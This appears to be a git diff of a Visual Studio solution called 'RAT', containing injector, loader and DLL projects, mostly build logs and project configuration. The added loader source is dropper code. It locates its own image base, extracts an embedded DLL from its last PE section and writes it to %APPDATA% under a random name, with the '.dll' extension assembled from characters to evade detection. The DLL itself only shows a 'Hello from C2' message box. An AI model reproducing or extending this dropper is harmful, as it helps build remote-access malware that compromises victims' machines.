diff --git a/Debug/FunDLL.exp b/Debug/FunDLL.exp new file mode 100644 index 0000000..365888f Binary files /dev/null and b/Debug/FunDLL.exp differ diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj new file mode 100644 index 0000000..2be397b Binary files /dev/null and b/Debug/FunDLL.iobj differ diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb new file mode 100644 index 0000000..e9521e9 Binary files /dev/null and b/Debug/FunDLL.ipdb differ diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb new file mode 100644 index 0000000..5cc9330 Binary files /dev/null and b/Debug/FunDLL.pdb differ diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb new file mode 100644 index 0000000..3afe78f Binary files /dev/null and b/Debug/Injector.pdb differ diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb new file mode 100644 index 0000000..7442067 Binary files /dev/null and b/Debug/Loader.pdb differ diff --git a/Dll/Debug/Dll.Build.CppClean.log b/Dll/Debug/Dll.Build.CppClean.log new file mode 100644 index 0000000..d6d1236 --- /dev/null +++ b/Dll/Debug/Dll.Build.CppClean.log @@ -0,0 +1,13 @@ +c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj +c:\users\hellisabove\source\repos\rat\debug\dll.lib +c:\users\hellisabove\source\repos\rat\debug\dll.exp +c:\users\hellisabove\source\repos\rat\debug\dll.dll +c:\users\hellisabove\source\repos\rat\debug\dll.pdb +c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log new file mode 100644 index 0000000..a7d3ee7 --- /dev/null +++ b/Dll/Debug/Dll.log @@ -0,0 +1,7 @@ +C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. +C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior. + Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp + Generating code + All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + Finished generating code + Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll diff --git a/Dll/Debug/Dll.tlog/CL.command.1.tlog b/Dll/Debug/Dll.tlog/CL.command.1.tlog new file mode 100644 index 0000000..4fe39f0 Binary files /dev/null and b/Dll/Debug/Dll.tlog/CL.command.1.tlog differ diff --git a/Dll/Debug/Dll.tlog/CL.read.1.tlog b/Dll/Debug/Dll.tlog/CL.read.1.tlog new file mode 100644 index 0000000..8d47c28 Binary files /dev/null and b/Dll/Debug/Dll.tlog/CL.read.1.tlog differ diff --git a/Dll/Debug/Dll.tlog/CL.write.1.tlog b/Dll/Debug/Dll.tlog/CL.write.1.tlog new file mode 100644 index 0000000..27f4603 Binary files /dev/null and b/Dll/Debug/Dll.tlog/CL.write.1.tlog differ diff --git a/Dll/Debug/Dll.tlog/Dll.lastbuildstate b/Dll/Debug/Dll.tlog/Dll.lastbuildstate new file mode 100644 index 0000000..23245b8 --- /dev/null +++ b/Dll/Debug/Dll.tlog/Dll.lastbuildstate @@ -0,0 +1,2 @@ +#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 +Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| diff --git a/Dll/Debug/Dll.tlog/Dll.write.1u.tlog b/Dll/Debug/Dll.tlog/Dll.write.1u.tlog new file mode 100644 index 0000000..7e00ff0 Binary files /dev/null and b/Dll/Debug/Dll.tlog/Dll.write.1u.tlog differ diff --git a/Dll/Debug/Dll.tlog/link.command.1.tlog b/Dll/Debug/Dll.tlog/link.command.1.tlog new file mode 100644 index 0000000..75aba57 Binary files /dev/null and b/Dll/Debug/Dll.tlog/link.command.1.tlog differ diff --git a/Dll/Debug/Dll.tlog/link.read.1.tlog b/Dll/Debug/Dll.tlog/link.read.1.tlog new file mode 100644 index 0000000..d81d459 Binary files /dev/null and b/Dll/Debug/Dll.tlog/link.read.1.tlog differ diff --git a/Dll/Debug/Dll.tlog/link.write.1.tlog b/Dll/Debug/Dll.tlog/link.write.1.tlog new file mode 100644 index 0000000..e3312ec Binary files /dev/null and b/Dll/Debug/Dll.tlog/link.write.1.tlog differ diff --git a/Injector/x64/Debug/Injector.vcxproj.FileListAbsolute.txt b/Dll/Debug/Dll.vcxproj.FileListAbsolute.txt similarity index 100% rename from Injector/x64/Debug/Injector.vcxproj.FileListAbsolute.txt rename to Dll/Debug/Dll.vcxproj.FileListAbsolute.txt diff --git a/Dll/Debug/FunDLL.Build.CppClean.log b/Dll/Debug/FunDLL.Build.CppClean.log new file mode 100644 index 0000000..a1a62d7 --- /dev/null +++ b/Dll/Debug/FunDLL.Build.CppClean.log @@ -0,0 +1,15 @@ +c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj +c:\users\hellisabove\source\repos\rat\debug\fundll.lib +c:\users\hellisabove\source\repos\rat\debug\fundll.exp +c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb +c:\users\hellisabove\source\repos\rat\debug\fundll.iobj +c:\users\hellisabove\source\repos\rat\debug\fundll.dll +c:\users\hellisabove\source\repos\rat\debug\fundll.pdb +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog +c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog new file mode 100644 index 0000000..b1f5512 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog new file mode 100644 index 0000000..8d47c28 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog new file mode 100644 index 0000000..27f4603 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.lastbuildstate b/Dll/Debug/FunDLL.tlog/FunDLL.lastbuildstate new file mode 100644 index 0000000..23245b8 --- /dev/null +++ b/Dll/Debug/FunDLL.tlog/FunDLL.lastbuildstate @@ -0,0 +1,2 @@ +#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 +Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog new file mode 100644 index 0000000..cecb9a2 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.command.1.tlog b/Dll/Debug/FunDLL.tlog/link.command.1.tlog new file mode 100644 index 0000000..ea9fd82 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/link.command.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.read.1.tlog b/Dll/Debug/FunDLL.tlog/link.read.1.tlog new file mode 100644 index 0000000..d66d11c Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/link.read.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.write.1.tlog b/Dll/Debug/FunDLL.tlog/link.write.1.tlog new file mode 100644 index 0000000..1b566d3 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/link.write.1.tlog differ diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb new file mode 100644 index 0000000..c1fb6af Binary files /dev/null and b/Dll/Debug/vc141.pdb differ diff --git a/FunDLL/FunDLL.vcxproj b/Dll/Dll.vcxproj similarity index 88% rename from FunDLL/FunDLL.vcxproj rename to Dll/Dll.vcxproj index e8535df..8574aaf 100644 --- a/FunDLL/FunDLL.vcxproj +++ b/Dll/Dll.vcxproj @@ -21,17 +21,18 @@ 16.0 Win32Proj - {c7e129b4-8a7e-4e5c-a259-573609675fed} - RAT + {0299d361-d3f7-419a-ab93-fb36642c97fa} + Dll 7.0 FunDLL - Application + DynamicLibrary true - v143 + v141_xp Unicode + true Application @@ -41,18 +42,17 @@ Unicode - DynamicLibrary + Application true - v141_xp - MultiByte - true + v143 + Unicode - DynamicLibrary + Application false - v141_xp + v143 true - MultiByte + Unicode @@ -72,18 +72,25 @@ - + false Level3 - true - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true + false + WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + false + MaxSpeed + true + Default + MultiThreaded + true + ProgramDatabase + true - Console + Windows true @@ -106,21 +113,13 @@ Level3 - false - WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) - false - MaxSpeed - true - false - Default - MultiThreaded - true - ProgramDatabase + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true - Windows + Console true - 5.01 @@ -128,16 +127,15 @@ Level3 true true - false - WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) - false + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true - Windows + Console true true true - 5.02 diff --git a/FunDLL/FunDLL.vcxproj.filters b/Dll/Dll.vcxproj.filters similarity index 100% rename from FunDLL/FunDLL.vcxproj.filters rename to Dll/Dll.vcxproj.filters diff --git a/FunDLL/FunDLL.vcxproj.user b/Dll/Dll.vcxproj.user similarity index 100% rename from FunDLL/FunDLL.vcxproj.user rename to Dll/Dll.vcxproj.user diff --git a/FunDLL/fundll.cpp b/Dll/fundll.cpp similarity index 79% rename from FunDLL/fundll.cpp rename to Dll/fundll.cpp index 640de68..5882e98 100644 --- a/FunDLL/fundll.cpp +++ b/Dll/fundll.cpp @@ -9,12 +9,11 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) { break; default: - + break; } - return 1; } extern "C" __declspec(dllexport) int FunEntry() { - return MessageBoxA(0, "Hello World From C2", 0, 0); + return MessageBoxA(0, "Hello from C2", 0, 0); } \ No newline at end of file diff --git a/Injector/Debug/Injector.Build.CppClean.log b/Injector/Debug/Injector.Build.CppClean.log new file mode 100644 index 0000000..64be309 --- /dev/null +++ b/Injector/Debug/Injector.Build.CppClean.log @@ -0,0 +1,13 @@ +c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb +c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb +c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj +c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk +c:\users\hellisabove\source\repos\rat\debug\injector.exe +c:\users\hellisabove\source\repos\rat\debug\injector.pdb +c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog +c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog +c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog +c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog +c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog +c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog +c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog diff --git a/Injector/Debug/Injector.exe.recipe b/Injector/Debug/Injector.exe.recipe new file mode 100644 index 0000000..f052071 --- /dev/null +++ b/Injector/Debug/Injector.exe.recipe @@ -0,0 +1,11 @@ + + + + + C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe + + + + + + \ No newline at end of file diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk new file mode 100644 index 0000000..b2ac90c Binary files /dev/null and b/Injector/Debug/Injector.ilk differ diff --git a/Injector/Debug/Injector.log b/Injector/Debug/Injector.log new file mode 100644 index 0000000..198e2b0 --- /dev/null +++ b/Injector/Debug/Injector.log @@ -0,0 +1,2 @@ + LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link + Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe diff --git a/Injector/Debug/Injector.tlog/CL.command.1.tlog b/Injector/Debug/Injector.tlog/CL.command.1.tlog new file mode 100644 index 0000000..ec99c38 Binary files /dev/null and b/Injector/Debug/Injector.tlog/CL.command.1.tlog differ diff --git a/Injector/Debug/Injector.tlog/CL.read.1.tlog b/Injector/Debug/Injector.tlog/CL.read.1.tlog new file mode 100644 index 0000000..0c81f4c Binary files /dev/null and b/Injector/Debug/Injector.tlog/CL.read.1.tlog differ diff --git a/Injector/Debug/Injector.tlog/CL.write.1.tlog b/Injector/Debug/Injector.tlog/CL.write.1.tlog new file mode 100644 index 0000000..7873a02 Binary files /dev/null and b/Injector/Debug/Injector.tlog/CL.write.1.tlog differ diff --git a/Injector/Debug/Injector.tlog/Cl.items.tlog b/Injector/Debug/Injector.tlog/Cl.items.tlog new file mode 100644 index 0000000..31c4d28 --- /dev/null +++ b/Injector/Debug/Injector.tlog/Cl.items.tlog @@ -0,0 +1 @@ +C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj diff --git a/Injector/Debug/Injector.tlog/Injector.lastbuildstate b/Injector/Debug/Injector.tlog/Injector.lastbuildstate new file mode 100644 index 0000000..4253841 --- /dev/null +++ b/Injector/Debug/Injector.tlog/Injector.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0: +Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| diff --git a/Injector/Debug/Injector.tlog/link.command.1.tlog b/Injector/Debug/Injector.tlog/link.command.1.tlog new file mode 100644 index 0000000..09060de Binary files /dev/null and b/Injector/Debug/Injector.tlog/link.command.1.tlog differ diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog new file mode 100644 index 0000000..4a6fd2d Binary files /dev/null and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ diff --git a/Injector/Debug/Injector.tlog/link.write.1.tlog b/Injector/Debug/Injector.tlog/link.write.1.tlog new file mode 100644 index 0000000..60df88e Binary files /dev/null and b/Injector/Debug/Injector.tlog/link.write.1.tlog differ diff --git a/Injector/Debug/Injector.vcxproj.FileListAbsolute.txt b/Injector/Debug/Injector.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb new file mode 100644 index 0000000..a02dcd8 Binary files /dev/null and b/Injector/Debug/vc143.idb differ diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb new file mode 100644 index 0000000..bc03652 Binary files /dev/null and b/Injector/Debug/vc143.pdb differ diff --git a/Injector/Injector.vcxproj b/Injector/Injector.vcxproj index be9bf59..fce0f03 100644 --- a/Injector/Injector.vcxproj +++ b/Injector/Injector.vcxproj @@ -35,9 +35,9 @@ Application false - v143 + v141 true - Unicode + MultiByte Application @@ -127,7 +127,7 @@ - + diff --git a/Injector/Injector.vcxproj.filters b/Injector/Injector.vcxproj.filters index 3e7e62e..9ce493a 100644 --- a/Injector/Injector.vcxproj.filters +++ b/Injector/Injector.vcxproj.filters @@ -15,7 +15,7 @@ - + Source Files diff --git a/Injector/Source.cpp b/Injector/injector.cpp similarity index 100% rename from Injector/Source.cpp rename to Injector/injector.cpp diff --git a/Injector/x64/Debug/Injector.Build.CppClean.log b/Injector/x64/Debug/Injector.Build.CppClean.log deleted file mode 100644 index 0ecb3c6..0000000 --- a/Injector/x64/Debug/Injector.Build.CppClean.log +++ /dev/null @@ -1,12 +0,0 @@ -c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.pdb -c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.idb -c:\users\hellisabove\source\repos\rat\injector\x64\debug\source.obj -c:\users\hellisabove\source\repos\rat\x64\debug\injector.ilk -c:\users\hellisabove\source\repos\rat\x64\debug\injector.exe -c:\users\hellisabove\source\repos\rat\x64\debug\injector.pdb -c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.command.1.tlog -c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.read.1.tlog -c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.write.1.tlog -c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.command.1.tlog -c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.read.1.tlog -c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.write.1.tlog diff --git a/Injector/x64/Debug/Injector.log b/Injector/x64/Debug/Injector.log deleted file mode 100644 index f142a7f..0000000 --- a/Injector/x64/Debug/Injector.log +++ /dev/null @@ -1,2 +0,0 @@ - Source.cpp - Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\x64\Debug\Injector.exe diff --git a/Loader/Debug/Loader.Build.CppClean.log b/Loader/Debug/Loader.Build.CppClean.log new file mode 100644 index 0000000..159bfc9 --- /dev/null +++ b/Loader/Debug/Loader.Build.CppClean.log @@ -0,0 +1,11 @@ +c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb +c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj +c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj +c:\users\hellisabove\source\repos\rat\debug\loader.exe +c:\users\hellisabove\source\repos\rat\debug\loader.pdb +c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog +c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog +c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog +c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog +c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog +c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog diff --git a/Loader/Debug/Loader.log b/Loader/Debug/Loader.log new file mode 100644 index 0000000..edac3ef --- /dev/null +++ b/Loader/Debug/Loader.log @@ -0,0 +1,2 @@ +C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. + Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe diff --git a/Loader/Debug/Loader.tlog/CL.command.1.tlog b/Loader/Debug/Loader.tlog/CL.command.1.tlog new file mode 100644 index 0000000..ad07b3b Binary files /dev/null and b/Loader/Debug/Loader.tlog/CL.command.1.tlog differ diff --git a/Loader/Debug/Loader.tlog/CL.read.1.tlog b/Loader/Debug/Loader.tlog/CL.read.1.tlog new file mode 100644 index 0000000..51bc714 Binary files /dev/null and b/Loader/Debug/Loader.tlog/CL.read.1.tlog differ diff --git a/Loader/Debug/Loader.tlog/CL.write.1.tlog b/Loader/Debug/Loader.tlog/CL.write.1.tlog new file mode 100644 index 0000000..484979f Binary files /dev/null and b/Loader/Debug/Loader.tlog/CL.write.1.tlog differ diff --git a/Loader/Debug/Loader.tlog/Loader.lastbuildstate b/Loader/Debug/Loader.tlog/Loader.lastbuildstate new file mode 100644 index 0000000..23245b8 --- /dev/null +++ b/Loader/Debug/Loader.tlog/Loader.lastbuildstate @@ -0,0 +1,2 @@ +#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 +Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| diff --git a/Loader/Debug/Loader.tlog/link.command.1.tlog b/Loader/Debug/Loader.tlog/link.command.1.tlog new file mode 100644 index 0000000..1aeeb1c Binary files /dev/null and b/Loader/Debug/Loader.tlog/link.command.1.tlog differ diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog new file mode 100644 index 0000000..62b1f8e Binary files /dev/null and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ diff --git a/Loader/Debug/Loader.tlog/link.write.1.tlog b/Loader/Debug/Loader.tlog/link.write.1.tlog new file mode 100644 index 0000000..e0d3597 Binary files /dev/null and b/Loader/Debug/Loader.tlog/link.write.1.tlog differ diff --git a/Loader/Debug/Loader.vcxproj.FileListAbsolute.txt b/Loader/Debug/Loader.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb new file mode 100644 index 0000000..8f184aa Binary files /dev/null and b/Loader/Debug/vc141.pdb differ diff --git a/Loader/Loader.vcxproj b/Loader/Loader.vcxproj new file mode 100644 index 0000000..0e0d345 --- /dev/null +++ b/Loader/Loader.vcxproj @@ -0,0 +1,165 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {81f05638-72b8-41da-b80a-4f292961d9a1} + Loader + 10.0 + + + + Application + true + v141_xp + Unicode + + + Application + false + v141_xp + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v141_xp + true + Unicode + + + + + + + + + + + + + + + + + + + + + false + + + false + + + false + + + + TurnOffAllWarnings + false + WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + false + ProgramDatabase + MaxSpeed + true + true + Default + MultiThreaded + false + + + Windows + true + kernel32.lib;user32.lib + + + + + TurnOffAllWarnings + false + true + true + WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + true + MultiThreaded + false + + + Windows + true + true + true + + + kernel32.lib;user32.lib + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + TurnOffAllWarnings + false + true + false + WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + true + MultiThreaded + false + + + Windows + true + true + true + + + + + + + + + + + + + \ No newline at end of file diff --git a/Loader/Loader.vcxproj.filters b/Loader/Loader.vcxproj.filters new file mode 100644 index 0000000..dfe9fcf --- /dev/null +++ b/Loader/Loader.vcxproj.filters @@ -0,0 +1,30 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + Source Files + + + + + Header Files + + + \ No newline at end of file diff --git a/Loader/Loader.vcxproj.user b/Loader/Loader.vcxproj.user new file mode 100644 index 0000000..88a5509 --- /dev/null +++ b/Loader/Loader.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/Loader/loader.cpp b/Loader/loader.cpp new file mode 100644 index 0000000..35af249 --- /dev/null +++ b/Loader/loader.cpp @@ -0,0 +1,23 @@ +#include +#include "tools.h" + +INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) { + PBYTE module_base = PBYTE(Tools::GetImageBase()); + if (module_base != ERROR) { + // extract payload from section move to %appdata% with random name + DWORD module_size = NULL; + PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size); + + // move payload onto %appdata% with some random generated name + DWORD bytes_written = NULL; + WCHAR appdata_path[MAX_PATH]; + + if (ExpandEnvironmentStringsW(TEXT("%APPDATA%"), appdata_path, MAX_PATH - 1) > 0) { + wsprintfW(appdata_path, TEXT("%s\\%lu.%cl%c"), appdata_path, GetTickCount(), 'd', 'l'); + HANDLE new_file = CreateFileW(appdata_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (new_file != INVALID_HANDLE_VALUE) { + WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL); + } + } + } +} \ No newline at end of file diff --git a/Loader/tools.cpp b/Loader/tools.cpp new file mode 100644 index 0000000..ceadd41 --- /dev/null +++ b/Loader/tools.cpp @@ -0,0 +1,36 @@ +#include "tools.h" +#include + +PVOID Tools::GetImageBase() { + PWORD virtual_address = PWORD(&GetImageBase); + PDWORD image_base = NULL; + + __asm { + mov eax, virtual_address + and eax, 0xFFFF0000 + IterateImage: + cmp WORD PTR[eax], 0x5A4D + je EndIteration + sub eax, 0x00010000 + jmp IterateImage + EndIteration: + mov[image_base], eax + } + + return image_base; +} + +PBYTE Tools::ExtractDllFile(PBYTE module_base, PDWORD module_size) { + PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)(module_base); + if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) { + PIMAGE_NT_HEADERS image_nt_headers = (PIMAGE_NT_HEADERS)(module_base + image_dos_header->e_lfanew); + if (image_nt_headers->Signature == IMAGE_NT_SIGNATURE) { + PIMAGE_SECTION_HEADER first_section = (PIMAGE_SECTION_HEADER)(IMAGE_FIRST_SECTION(image_nt_headers)); + PIMAGE_SECTION_HEADER dll_section = (PIMAGE_SECTION_HEADER)(first_section + image_nt_headers->FileHeader.NumberOfSections - 1); + if (dll_section != ERROR) { + *module_size = dll_section->Misc.VirtualSize; + return RtlOffsetToPointer(module_base, dll_section->VirtualAddress); + } + } + } +} \ No newline at end of file diff --git a/Loader/tools.h b/Loader/tools.h new file mode 100644 index 0000000..f9459ac --- /dev/null +++ b/Loader/tools.h @@ -0,0 +1,9 @@ +#pragma once +#include + +#define RtlOffsetToPointer(Module, Pointer) PBYTE(PBYTE(Module) + DWORD(Pointer)) + +namespace Tools { + PVOID GetImageBase(); + PBYTE ExtractDllFile(PBYTE module_base, PDWORD module_size); +} diff --git a/RAT.sln b/RAT.sln index 6847389..a2f7dca 100644 --- a/RAT.sln +++ b/RAT.sln @@ -5,7 +5,9 @@ VisualStudioVersion = 17.6.33815.320 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Injector", "Injector\Injector.vcxproj", "{9C556697-73D5-47E2-908C-B285CB253CC6}" EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "FunDLL\FunDLL.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}" +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{81F05638-72B8-41DA-B80A-4F292961D9A1}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll", "Dll\Dll.vcxproj", "{0299D361-D3F7-419A-AB93-FB36642C97FA}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution @@ -23,14 +25,22 @@ Global {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x64.Build.0 = Release|x64 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.ActiveCfg = Release|Win32 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.Build.0 = Release|Win32 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64 - 